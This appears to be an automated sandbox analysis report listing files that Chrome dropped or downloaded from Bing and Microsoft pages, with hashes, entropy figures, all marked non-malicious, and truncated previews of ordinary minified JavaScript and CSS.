                                                                            Preview:(function(){function v(){n&&(sj_be(_d.body,"click",y),sj_be(n,"click",p),f&&sj_be(f,"click",w),sj_evt.bind("PrimaryNavDropdownMenuShow",i),sj_evt.bind("scs_openflyout",i))}function y(){typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,t)&&i()}function p(r){r.stopPropagation();typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,t)?i():b()}function w(n){n.stopPropagation();var t=s(n.target);t!=null&&Log&&Log.Log&&Log.Log("Click",u,"ScopeDropdownMenuItemClick",!1,"ItemId",t.id);c.trigger(i,null)}function s(n){return n===null?null:typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,e)||Lib.CssClass.contains(n,"b_sp_over_cont")?null:typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,a)?n:n.parentElement?s(n.parentElement):null}function b(){sj_evt.fire("ScopeDropdownMenuShow");typeof Lib.CssClass!="undefined"&&Lib.CssClass.add(n,t);r&&typeof Lib.CssClass!="undefined"&&Lib.CssClass.add(r,o);Log&&Log.Log&&Log.Log("Show",u,"ScopeDropdownMenuShow");n.setAttribute("aria
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1255), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1255
                                                                            Entropy (8bit):5.160709455885502
                                                                            Encrypted:false
                                                                            SSDEEP:24:SRW9/dnlg/izSunyL3XC/A/o5VFoz/o7gi6mA/Jmd16g7DbYEgSn:Sw9/dlgTunyjC/A/xM7gB/JW6g7DbYEH
                                                                            MD5:41F20604918FA0BE3BB77A96E4308794
                                                                            SHA1:38593C2497F4F4D48026078ECFEDE72F1DFC44B5
                                                                            SHA-256:B1F4F444BED02032B37697FF69D62B7A3F8B291CB6F129E2291C234C23C85E25
                                                                            SHA-512:606C2631A625CA0EDD6C7E9730E353FE8C07B612F48D1B3244B13299B49C28C97AA6DBC6092DED8CAE3F6B087E3FC5E2BB2E916DDE5C3FCC87553DCFCDEAB13C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:function init(){for(var i,t=_d.getElementsByClassName("toggle_item"),n=0;n<t.length;n++)i=t[n],ToggleControl.createToggleControl(i.id)}var ToggleControlImpl;(function(n){function v(n){var t,i,h,c;r=_w.hp_addclass;u=_w.hp_removeclass;t=_ge(n);i=_ge(n+e);t&&i&&(h=function(){return f(t,i,n)},c=function(n){var t=n.which||n.keyCode;(t==13||t==32)&&(sj_pd(n),h())},sj_be(t,o,h),sj_be(t,s,c))}function f(n,f,e){var o;if(r&&u){if(f.className.indexOf(t)>-1)return;o=f.className.indexOf(i)>-1;o?u(f,i):r(f,i)}else{if(Lib.CssClass.contains(f,t))return;o=Lib.CssClass.contains(f,i);Lib.CssClass.toggle(f,i)}Log.Log("Click","Button",o?"ToggleOff":"ToggleOn",!1,"AppNS",n.getAttribute("data-appns"),"K",n.getAttribute("data-k"),"Category","CommonControls");n.setAttribute(l,o?"false":"true");sj_evt.fire(e+h,!o)}function y(n,i,f){var e;r&&u?(e=i.className.indexOf(t)>-1,e?u(i,t):r(i,t)):(e=Lib.CssClass.contains(i,t),Lib.CssClass.toggle(i,t));n.setAttribute(a,e?"false":"true");sj_evt.fire(f+c,!e)}var e="_ctrl",
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65296), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):314905
                                                                            Entropy (8bit):5.097913540297634
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Skz1b3b99G9gR7N1xf6ilFy5sPQALfohFAdNILHdkmBHV6ysv9S/NYWme0QWskBg:F+W1fohp
                                                                            MD5:1F57585F277BD4038023A187037C1EC9
                                                                            SHA1:ADDC410520FBC88358E9D6867B3A121A107ED610
                                                                            SHA-256:DBF59490EBCC2D95794328F176F73688EB1972EABA8A234B3B9A6E20E784B760
                                                                            SHA-512:4B71315BBA08D8F2FEE38376AC14C10F5A93A8BA55E8EBF0718D607DDDF03BEB00B7072188CD243736096DC61DABCD879C376420EC11CC8A8A98E7E58530281D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/css/mwf2/moray-mwf2.main.1.0.4.354.min.css
                                                                            Preview:@charset "UTF-8";/*!.. * MWF (Moray) v2.13.0.. * Copyright (c) Microsoft Corporation. All rights reserved... * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc... * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang)... */@font-face{font-family:MWF-FLUENT-ICONS;src:url(../../fonts/MWFFluentIcons.woff2) format("woff2"),url(../../fonts/MWFFluentIcons.woff) format("woff"),url(../../fonts/MWFFluentIcons.ttf) format("truetype")}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf) format("ttf");font-weight:400}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/l
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3982), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):3982
                                                                            Entropy (8bit):4.974018387969601
                                                                            Encrypted:false
                                                                            SSDEEP:48:jgYrPMI/1BY4YjYb0nI4VAwgjWSWtovO785LdjCAPEUYUvRHdMIt055ECNqyk:EYrPMIN9Wc3x2AsUYUvRHdMQgY
                                                                            MD5:67FB8A0C4472856326D901B40C91368A
                                                                            SHA1:D2B4E094E847C514E40566028A5866C2AFE05B11
                                                                            SHA-256:DE9AFF9E191999B605CF083CA88FBB86BBBCC70CFFE11F5D1535F345EFA6AECE
                                                                            SHA-512:FA8691B47E05EA4B16FCDE68838DDF95BC019F0E47392C0D53A27AEA09BC73F0ABA3DC0D38C71D2F09637BE83977F45CD2B0D1A2C20C41EE29A09FD7F4B4F91C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/0rTglOhHxRTkBWYCilhmwq_gWxE.css
                                                                            Preview:#b_results .b_expando .b_icbtns .ibs_btn,#b_context .b_icbtns .ibs_btn,#b_pole .b_icbtns .ibs_btn{border-color:#106ebe;color:#106ebe}#b_content #b_context .b_sgmbtns a.cbtn,#b_content #b_context .b_sgmbtns a.cbtn:visited,#b_content #b_results .b_sgmbtns a.cbtn,#b_content #b_results .b_sgmbtns a.cbtn:visited,#b_content #b_context .b_sgmbtns .b_tpoptbtn,#b_content #b_context .b_sgmbtns .b_tpoptbtn:visited,#b_content #b_results .b_sgmbtns .b_tpoptbtn,#b_content #b_results .b_sgmbtns .b_tpoptbtn:visited{border-color:#106ebe;background-color:#106ebe}.listCard.vertcard a.ibs_1btns .ibs_btn .b_primtxt,.listCard.vertcard a.ibs_2btns .ibs_btn .b_primtxt{color:#106ebe}.wk_buttons .wk_button .cbtn input,.wq_tq_sbutton2 .cbtn input[type="submit"],#ifeu a#GoToButton,#b_results li .coupon>button,#b_context li .coupon>button,#b_content .gtOfferBtn,#b_content .b_ans .rebatesBanner a.cbtn,#b_content .wpc_module .rebatesBanner a.cbtn,.wpc_module .rebatesBanner a.cbtn,#b_content .b_sgmbtns a.cbtn,#b_cont
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):287
                                                                            Entropy (8bit):5.108035590716981
                                                                            Encrypted:false
                                                                            SSDEEP:6:qUJd/ckDPodheRAgO9lVGGL5yKJOjkbVwhV7HzLBq92NY:02kUc5y6Oobm/O
                                                                            MD5:BED1CC02420CF32C17391E0398E3CA5A
                                                                            SHA1:3E1090349900BDB30176F5DD1795872CFCFADB26
                                                                            SHA-256:217ACB853DC6E85C93C8BFA3A6C1D75A921A431DB1A84CC6BC7E7AFD38BF4AD9
                                                                            SHA-512:869D58EA5C29FFA8F782B52CE40EE4163ABE5C3BBD324265D01AB108B63F9B9D4F861B34A659A5BB8C505D18FD214A9D7A7DC8754365C6DADB3D94E4EF0ACF4A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var wlc=function(n,t,i){var u,f,r;n&&Identity&&(u=Identity.popupLoginUrls)&&(f=u.WindowsLiveId)&&Identity.wlProfile&&(r=_d.createElement("iframe"),r.style.display="none",r.src=f+"&checkda=1",r.setAttribute("data-priority","2"),_d.body.appendChild(r),i&&t&&t("SRCHHPGUSR","WTS",i,1,"/"))}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):231
                                                                            Entropy (8bit):4.748639631293798
                                                                            Encrypted:false
                                                                            SSDEEP:6:YYvmXa34H6MWaK6IOGd0a34H2I+uKrS6KqYWqRM:o0Q6M5ihrQ2I+uKm6KoJ
                                                                            MD5:BD836FE3637F869FC3A70D435FE9F238
                                                                            SHA1:1E0ADBEE330315AE3B0E29F18A6C20A07C2BE457
                                                                            SHA-256:B2CB5A49E2C72297E7D06D4069934A3ABE936ED590A2F33E05CB7D17A0C45373
                                                                            SHA-512:7245B1AC3BD77B29BE4E078B28AE60B0BCDC10242FDA75102F9B791D89675154F94C9E559C09823CB9A5692A5254F12359B4B8863577C6EB5421792B33D88DC1
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/Hgrb7jMDFa47DinximwgoHwr5Fc.css
                                                                            Preview:.b_logo{transform:none}.b_logo:after{transform-origin:-48px 0}#detailPage .b_logo:after,#bnp_cookie_banner .b_logo:after{transform-origin:-48px 0}@media(forced-colors:active){.b_logo{forced-color-adjust:none;background-color:#000}}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2169), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):2169
                                                                            Entropy (8bit):5.302641155413102
                                                                            Encrypted:false
                                                                            SSDEEP:48:1cLdSF8cWOr7dDv8NQtaPVcbnAhaNaswAUbDdDLpmhMi7WViUCS7SDDRb:1cZSDBdDv8saMPgHfLEM8Xb3Rb
                                                                            MD5:61533293909D97252C70E82BD574BA68
                                                                            SHA1:7408DD25C19AE7BAF954074576A2F73FBB174310
                                                                            SHA-256:99EC639C3DDC51E7882FAB9C08EC5A905B49F4B04D1C47B6DF40F3924E81CD8E
                                                                            SHA-512:BF8F8879D1CABD6B8B9C6CAF9FC0A6F68362FC62328112636D78A15A4C08B35EA52E1DD8048715F2BD0E945BB0D2D8D7655E68A065942E89316E303BB536BB41
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:"https://r.bing.com/rs/6r/kQ/jnc,nj/P2A3uGO2O64dixlm8-ndJ5_iyo4.js?or=w"
                                                                            Preview:(function(){function l(n){return parseFloat((_w.getComputedStyle?_w.getComputedStyle(n):n.currentStyle).width)}var a="results_container",t="sb_shr sw_conv",v="sb_shr sw_conva",y={"ans2 ans_n2 ans_msnO":1},i={"sb_h3 cttl":1},r="sb_ltw",p="sb_ans",n=[],u=!!_G.SPSA,f=u?{ansC:1,results:1,sa_bop:1}:{results:1},e=!1,o=20,w=-28,b=function(){if(typeof _d.querySelector!="undefined"){var n=".sb_shr{left:"+w+o+"px;width:0;float:right;margin-left:5px}.sb_ltw{margin:0 0 0 -55px;clear:both;float:left;display:block;width:50px}.pi_tc{float:right;}";sj_ic(n);sj_evt.bind("sp.enter_conv",g,1);sj_evt.bind("sp.leave_conv",h,1);sj_evt.bind("sp.submit_conv",h)}},k=function(){var u,o,i,n,s,r,t,h;if(!e){for(u=_ge(a),o=u?u.childNodes:[],i=0;i<o.length;i++)if(n=o[i],n.id&&f[n.id]||n.className&&f[n.className])for(s=n?n.childNodes:[],r=0;r<s.length;r++)for(t=s[r].firstChild;t;)h=t.nodeType,h!==3&&h!==8&&d(t),t=t.nextSibling;e=!0}},d=function(n){var i=n.className,t;if(i&&i.indexOf(p)>-1){if(u)for(t=n.firstChild.fir
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1725), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1725
                                                                            Entropy (8bit):5.274895734185393
                                                                            Encrypted:false
                                                                            SSDEEP:24:y2x50QNQE0YpOP8A47n0dvZ1fj5O7Rv75gZcODcv/Kum65X9gFiO5yV94GVvwCQO:7Lps4YJOVuK2KG65tggZV5
                                                                            MD5:2EF3074238B080B648E9A10429D67405
                                                                            SHA1:15D57873FF98195C57E34FC778ACCC41C21172E7
                                                                            SHA-256:E90558EB19208AD73F0DE1CD9839D0317594BF23DA0514F51272BF27183F01DA
                                                                            SHA-512:C1D7074A0EBF5968B468F98FC4C0C7829999E402DD91C617E679EEB46C873DC04096CBF9277E115FC42C97516A6C11A9F16AFA571E00F0D826BEB463E2D1F7B0
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var RewardsCreditRefresh;(function(n){function r(t,i,r,u,f,e,o,s,h,c,l,a,v,y){sj_cook.set(t,i,r.toString(),!1,"/");sj_cook.set(t,u,f.toString(),!1,"/");sj_cook.set(t,e,o.toString(),!1,"/");sj_cook.set(t,s,h.toString(),!1,"/");sj_cook.set(t,c,l.toString(),!1,"/");sj_cook.set(t,a,v.toString(),!1,"/");sj_evt.fire("RewardsCookieUpdated");sj_evt.bind("identityHeaderShown",function(){return n.RewardsHeaderAnim(o,r,f,y)},1)}function u(n,r,u,f){var c;u=u||r;var o=_ge("id_rh"),e=_ge("rh_animcrcl"),l=_ge("id_rc");if(o&&l&&(e||_ge("givemuid_heart"))&&!(r<0)&&!(r<n)&&!(u<=0)){var a=800,v=r-n,s=Math.min(100,100*(r/u)),h=e&&s>=100&&n<u,y=v>0,p=Date.now();s>=100&&Lib.CssClass.add(o,"rh_reedm");e&&Lib.CssClass.add(e,"anim");c=function(u){if(u){var k=Date.now(),w=k-p,b=Math.min(w/a,1),d=h?t*b:t*s/100,g=y?Math.min(Math.floor((n+b*v)/f)*f,r):r,l=_ge("rewardsAnimation");e&&e.setAttribute("stroke-dasharray",d.toString()+","+t.toString());u.innerText=g.toString();(h||y)&&(w<a?i(function(){return c(u)}):(u.i
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (888), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):888
                                                                            Entropy (8bit):5.1970220185324045
                                                                            Encrypted:false
                                                                            SSDEEP:24:2QiCUrgtI/QHnUrtrRIRJ7ea/TwH4Mnbx+yGow0N:SK44AIb/7QUH0N
                                                                            MD5:F1CF1909716CE3DA53172898BB780024
                                                                            SHA1:D8D34904E511B1C9AAE1565BA10CCD045C940333
                                                                            SHA-256:9ABAC0CBFA6F89106B66CD4F698EAD5CCBF615ECF8CD7E9E88567A7C33CFEC01
                                                                            SHA-512:8B641E93405565B4A57C051EDEFC8E02D6C929DDD4C52F9BFBD19C57896AA40426BF5ED6760DBD479719561C4F0A25BFC4102F0F49D3D308035C9CA90B1D0FCE
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/2NNJBOURscmq4VZboQzNBFyUAzM.js
                                                                            Preview:(function(){function f(){var u=o(),i,t,f;if(u)for(i=s(u),t=0;t<i.length;t++)f=i[t].id.replace(n,""),Log&&Log.Log&&Log.Log("Info",r,f,!1,"Text",t.toString()),sj_be(i[t],"mousedown",e)}function e(t){var r=i(t.target),f;r!=null&&(f=r.id.replace(n,""),Log&&Log.Log&&Log.Log("Info",u,f))}function i(t){if(t!=null){var r=t.id;return r!=null&&r.indexOf(n)===0?t:i(t.parentElement)}return null}function o(){var n=_d.querySelectorAll(".b_scopebar > ul");return n&&n.length>0?n[0]:null}function s(i){for(var r,o,u=[],e=i.children,f=0;f<e.length;f++)r=e[f].id,r!=null&&r!==t&&r.indexOf(n)===0?u.push(e[f]):r!=null&&r===t&&(o=h(),u.push.apply(u,o));return u}function h(){var n=_d.querySelectorAll(".b_scopebar #b-scopeListItem-menu .b_sp_over_menu .b_scopebar_item");return Array.prototype.slice.call(n)}var n="b-scopeListItem-",t=n+"menu",r="DynScopeRank",u="DynScopeClick";sj_evt.bind("onP1",f)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (838), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):838
                                                                            Entropy (8bit):5.10179630103155
                                                                            Encrypted:false
                                                                            SSDEEP:24:01rReu5mXKBj/BsKkRW5LuRWCfRM7ssdvcR:09wwDEw56w2+s6cR
                                                                            MD5:8C8B189422C448709EA6BD43EE898AFB
                                                                            SHA1:A4D6A99231D951F37D951BD8356D9D17664BF447
                                                                            SHA-256:567506D6F20F55859E137FCBD98F9E1A678C0D51192FF186E16FD99D6D301CFF
                                                                            SHA-512:6FAA73D59082065426769A27081CBEDCD22146EF948AFDD9A86801F205B2DDDC63E03AC5D555EF0AF23EF05901EBFFE7E8AADD82260EF505CB89D99E572FDF4A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/pNapkjHZUfN9lRvYNW2dF2ZL9Ec.js
                                                                            Preview:var CursorProgress;(function(n){function f(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function e(n){var u,e,o,s;n.button!==0||n.ctrlKey||n.shiftKey||(u=f(sj_et(n)),u!=null)&&u.getAttribute("role")!=="button"&&(r(),e=(u.getAttribute("href")||"").trim().toLowerCase(),e!==""&&e.indexOf("javascript:")!==0&&e.indexOf("#")!==0)&&(o=u.getAttribute("target"),o===null||o.trim()==="")&&(Lib.CssClass.add(u,t),s=_ge("b_content"),s!==null&&Lib.CssClass.add(s,t),i!==null&&(sb_ct(i),i=null),i=sb_st(r,5e3))}function r(){for(var i=_d.getElementsByClassName(t),n=i.length-1;n>=0;n--)Lib.CssClass.remove(i[n],t)}function u(){var r=_ge("b_content"),n,t,i;if(r!==null&&(n=r.getElementsByTagName("A"),n))for(t=0;t<n.length;t++)(i=n[t],i)&&sj_be(i,"click",e)}var t="b_CursorProgress",i=null;n.bind=u;u()})(CursorProgress||(CursorProgress={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1238), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1238
                                                                            Entropy (8bit):5.036109751467472
                                                                            Encrypted:false
                                                                            SSDEEP:24:6VfG6V5FpGjNOBE2ey3nXmaDU6CWiArShS9jHRRoy5++vGqSEqSs:S5lBiz6U6C8nH/+L4A
                                                                            MD5:77B3494B9357D848276019DB087DACD9
                                                                            SHA1:AE64A8EE51251498EA85CFE1D38DB23AB26C3F29
                                                                            SHA-256:F332B88324F67C9DEB79CA7D33BD57F161E39567E774E4FDD5C0509205E60B9B
                                                                            SHA-512:1BB59C6DBCF0C33DE192E4423DD321362811AD2C1F82665D737327580964C4A857AE35D4AAC902F33DBA89CEFDC9A87C7D4E5797D493BE2D66B5710F54F85154
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/rmSo7lElFJjqhc_h042yOrJsPyk.js
                                                                            Preview:var Feedback;(function(n){var t;(function(){"use strict";function e(t,i){var r=t.getAttribute("id"),u;r||(r="genId"+n.length,t.setAttribute("id",r));u=new f(r,i,t.getAttribute(i));n.push(u)}function i(n,t,i){i===null?n.removeAttribute(t):n.setAttribute(t,i)}function t(n,t,r,u){for(var f,s=_d.querySelectorAll(r),o=0;o<s.length;o++)(f=s[o],u&&f.id&&u[f.id])||(e(f,n),i(f,n,t))}function o(n){for(var u=_d.querySelectorAll(n),e=1,f={},t,i,r=0;r<u.length;++r){if(t=u[r],!t.id){for(;;)if(i="fbpgdgelem".concat(e++),!_ge(i))break;t.id=i}f[t.id]=t}return f}function r(){var i="tabindex",r="-1",n=o("#fbpgdg, #fbpgdg *");t(i,r,"div",n);t(i,r,"svg",n);t(i,r,"a",n);t(i,r,"li",n);t(i,r,"input",n);t(i,r,"select",n);t("aria-hidden","true","body :not(script):not(style)",n)}function u(){var t,f;for(sj_evt.unbind("ajax.feedback.init",r),sj_evt.unbind("ajax.feedback.cleanup",u),t=0;t<n.length;t++)f=_d.getElementById(n[t].id),f&&i(f,n[t].attributeName,n[t].originalAttributeValue);n.length=0}var n=[],f=function
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):53
                                                                            Entropy (8bit):4.418786907671611
                                                                            Encrypted:false
                                                                            SSDEEP:3:0+xEe47WSQCJKX0TgY:fxtrCJM9Y
                                                                            MD5:00C85972DD87B684BAF16ED6254B4388
                                                                            SHA1:39584C1C0864ABB6C26ADC5D916A649C6392A69C
                                                                            SHA-256:3DA94DE34236843C7D594B1697A09C4F079F3D9E866E620E7C0E2AC9EB6F3C29
                                                                            SHA-512:317323C2A11208407747754D02C3D0FAFD69A916F4A2C84CF6F213E3362666D1144B1708074B571CB29CCF2DF249462BAB12B2AD3756D82375CC6CFBBB4E1471
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/OVhMHAhkq7bCatxdkWpknGOSppw.css
                                                                            Preview:#b_results .b_algo .b_vlist2col.b_deep{color:#767676}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2687), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2687
                                                                            Entropy (8bit):5.103880568558176
                                                                            Encrypted:false
                                                                            SSDEEP:48:itt+rzsj4+/X7/Xxj/Xk/XJTGdS4bkRb4svSm/KbjxR0+DFZf4uAN4siQFk+oFQq:itwrgcuXDXpXcXJskRblaminxR0yIjl8
                                                                            MD5:A5C8347D508377BFE32F8552CAE03433
                                                                            SHA1:262E55E266AFE8FA8CD2A3E5E99BB1B80128C1D5
                                                                            SHA-256:AA03263ED1863A42418D316869FBBC0BC1FAAD3A1983B444EE73ED6636779B7F
                                                                            SHA-512:93B6731E9410EBD804DAE3AD0BB400887517AAB2B93CEF8B0927B331280979D9AE14B0CA42D6A860C6468E5B54295D7E298BA768139DB3E280D4B922681B0065
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var AccessibilityHelper;(function(n){function f(n,t,i){n&&n.classList&&t&&(i?n.classList.remove(t):n.classList.add(t))}function lt(n){if(n.keyCode===9)f(this,c,!0);else if(n.keyCode===13)if(this.click)this.click();else{var t=_d.createEvent("MouseEvents");t.initEvent(kt,!0,!0);this.dispatchEvent(t,!0)}}function at(){f(this,c)}function w(n){sj_pd(n);sj_sp(n)}function dt(n){var t;if(n){var r=n.querySelectorAll('a:not([disabled]):not([tabindex="-1"]), button:not([disabled]):not([tabindex="-1"]), input[type=text]:not([disabled]):not([tabindex="-1"]), [tabindex]:not([disabled]):not([tabindex="-1"])'),u=r.length,f=!1,i=null;for(t=0;t<u;t++)if(i=r[t],i.offsetWidth>0){if(ct===i){f=!0;break}i.focus();break}if(f)for(t=u-1;t>=0;t--)if(i=r[t],i.offsetWidth>0){i.focus();break}}}function b(n){var t=n.target||n.srcElement,r,u,i,f;if(t){for(r=_d.querySelectorAll(".accDialog"),u=null,i=0;i<r.length;i++)if(f=r[i],f.contains(t)){u=f;ct=t;break}e&&e.offsetWidth>0&&!e.contains(t)?(w(n),dt(e)):e=u}}function
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (576), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):576
                                                                            Entropy (8bit):5.192163014367754
                                                                            Encrypted:false
                                                                            SSDEEP:12:9mPi891gAseP24yXNbdPd1dPkelrR5MdKIKG/OgrfYc3tOfIvHbt:9mPlP5smDy1dV1dHrLMdKIKG/OgLYgtV
                                                                            MD5:F5712E664873FDE8EE9044F693CD2DB7
                                                                            SHA1:2A30817F3B99E3BE735F4F85BB66DD5EDF6A89F4
                                                                            SHA-256:1562669AD323019CDA49A6CF3BDDECE1672282E7275F9D963031B30EA845FFB2
                                                                            SHA-512:CA0EB961E52D37CAA75F0F22012C045876A8B1A69DB583FE3232EA6A7787A85BEABC282F104C9FD236DA9A500BA15FDF7BD83C1639BFD73EF8EB6A910B75290D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/KjCBfzuZ475zX0-Fu2bdXt9qifQ.js
                                                                            Preview:var SsoFrame;(function(n){function t(n){if(n&&n.url&&n.sandbox){var t=sj_ce("iframe"),i=t.style;i.visibility="hidden";i.position="absolute";i.height="0";i.width="0";i.border="none";t.src=decodeURIComponent(n.url);t.id="aadssofr";t.setAttribute("sandbox",n.sandbox);_d.body.appendChild(t);n.currentEpoch&&sj_cook.set("SRCHUSR","T",n.currentEpoch,!0,"/");Log&&Log.Log&&Log.Log("ClientInst","NoSignInAttempt","OrgId",!1)}}function i(n){try{n&&n.length===2&&t(n[1])}catch(i){}}n.createFrame=t;n.ssoFrameEntry=i;sj_evt.bind("ssoFrameExists",i,!0,null,!1)})(SsoFrame||(SsoFrame={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):75
                                                                            Entropy (8bit):4.546752318250266
                                                                            Encrypted:false
                                                                            SSDEEP:3:qTKe2LkTL4hgB5hKZZNlO2hKYt:qulLmLCg2ZJOTG
                                                                            MD5:505C1B97B12647FAD0E3392277FD7CB7
                                                                            SHA1:8EC44FB4A2F04BF2DFDAD616397EF84059094DDD
                                                                            SHA-256:A2246C34F2A1064973C523BA3C09E21DEB16CE351E3C26FFACA4FFBCA47867CC
                                                                            SHA-512:08715BDCDD35D8A3A4B07D584D00BD7861E41B87228707AF38B32AB5D6002FEC90C5004083935798D4ADDEE473316021E4BA9685977E047B7914E68722FF4E8E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/jsRPtKLwS_Lf2tYWOX74QFkJTd0.js
                                                                            Preview:var QuickSearch;(function(n){n.isCursor=!0})(QuickSearch||(QuickSearch={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1060), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1060
                                                                            Entropy (8bit):5.351152776949957
                                                                            Encrypted:false
                                                                            SSDEEP:24:2QmZ6qv3dhazSaxa7onMZN1GqPTz0KmNn4zVAoL3tMTCDU1nAA9zR9uHemdXp:2Om74MZN1tPv0KmNjAtMGD0zRPo
                                                                            MD5:F4DA106E481B3E221792289864C2D02A
                                                                            SHA1:D8BA5C1615A4A8ED8EE93C5C8E2EA0FB490A0994
                                                                            SHA-256:47CB84D180C1D6BA7578C379BDC396102043B31233544E25A5A6F738BB425AC9
                                                                            SHA-512:66518EE1B6C0DF613074E500A393E973844529CA81437C4BAFE6BF111CBA4D697AF4FE36B8D1B2AA9B25F3EB93CD76DF63ABFC3269AC7E9F87C5F28A3764008E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function t(t){typeof Log!==n&&typeof Log.Log!==n&&Log.Log("NcHeader","Rewards",t,!0)}function i(){var u,e,r,a,o,v,y,s,i,h;if(typeof bepcfg===n)t("bepcfg Undefined");else if(u=_ge("nc_iid"),u){var c=typeof bepcfg.wb!==n,l=typeof bepcfg.v!==n,f=u.getAttribute("_IG");if(f&&f.length||(f=_G.IG),e="&IID="+u.getAttribute("_iid")+"&IG="+f,l)try{sj_cook.get("")}catch(p){e+="&CID="+u.getAttribute("_cid")}r="/rewardsapp/ncheader?ver="+_G.AppVer+e;a=r;try{o=undefined;v=/(^|&)uncrunched=1(&|$)/i;o=v.exec(_w.location.search.substr(1));r=r+(o?"&uncrunched=1":"")}catch(w){r=a}y=_ge("rewardsEntryPoint");y&&(r="".concat(r,"&loadEntryPointsScript=1"));s=[_w.top,_w];i=sj_gx();i.open("POST",r,!0);i.setRequestHeader("Content-type","application/x-www-form-urlencoded");c&&(i.onreadystatechange=function(){i&&i.readyState==4&&i.status==200&&sj_appHTML(document.body,i.responseText)});h="wb="+(c?bepcfg.wb:"0");l&&(h+=";i="+(s[0]!==s[1].self?0:1)+";v="+bepcfg.v);i.send(h)}else t("nc_iid NotFound")}var
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1578), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1578
                                                                            Entropy (8bit):5.329734499973321
                                                                            Encrypted:false
                                                                            SSDEEP:24:2QDoc8McY0tjLr4H5uRlcHeO0M2AieYIriev+OmbTkC6+xbDntex3CcldxQp3j7O:NfZuRy0N1eYZ0waSbO3CBp/GiCHAhG
                                                                            MD5:0C0AD3FD8C0F48386B239455D60F772E
                                                                            SHA1:F76EC2CF6388DD2F61ADB5DAB8301F20451846FA
                                                                            SHA-256:DB6DDE4AEF63304DF67B89F427019D29632345D8B3B5FE1B55980F5D78D6E1E7
                                                                            SHA-512:E45A51EF2F0021F168A70AC49BDCC7F4FB7B91FF0DDD931F8ECBD70F6494C56285B2D9BC1170804801CE178244CCF361745B677B04C388B608D1471E0695EBEB
                                                                            Malicious:false
                                                                            Reputation:low
